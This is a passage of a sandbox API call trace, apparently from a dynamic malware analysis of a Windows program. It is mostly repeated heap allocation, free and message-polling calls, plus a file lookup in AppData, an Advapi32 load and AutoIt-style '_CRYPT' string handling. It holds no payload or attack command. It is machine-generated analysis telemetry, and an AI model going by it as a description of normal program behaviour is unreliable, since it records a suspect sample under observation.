Size=0x10) returned 0x2e509e0 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0243.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0243.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0243.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0243.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0243.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0243.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0243.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0243.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0243.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0243.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0243.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.089] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0243.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0243.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0243.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0243.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0243.089] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0243.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0243.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0243.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0243.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0243.090] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Resmon.ResmonCfg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f6a4d1, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x1db5, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="Resmon.ResmonCfg", cAlternateFileName="RESMON~1.RES")) returned 0xa87710 [0243.090] FindClose (in: hFindFile=0xa87710 | out: hFindFile=0xa87710) returned 1 [0243.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0243.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0243.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0243.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0243.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0243.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0243.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0243.091] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0243.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0243.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0243.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0243.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0243.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0243.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0243.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0243.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0243.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.092] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0243.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0243.092] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0243.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0243.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0243.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0243.092] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04428 [0243.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0243.092] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0243.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04428 | out: hHeap=0x970000) returned 1 [0243.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0243.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0243.093] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0243.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0243.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0243.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0243.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0243.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0243.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0243.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0243.093] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0243.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0243.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0243.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0243.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.246] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.246] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.246] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04428 [0243.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0243.246] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04428 | out: hHeap=0x970000) returned 1 [0243.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0243.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0243.247] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.247] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0243.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0243.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0243.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0243.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0243.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0243.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.248] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0243.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0243.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0243.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0243.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0243.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0243.248] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0243.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0243.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0243.249] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0243.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0243.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0243.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0243.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0243.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0243.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0243.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.250] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, 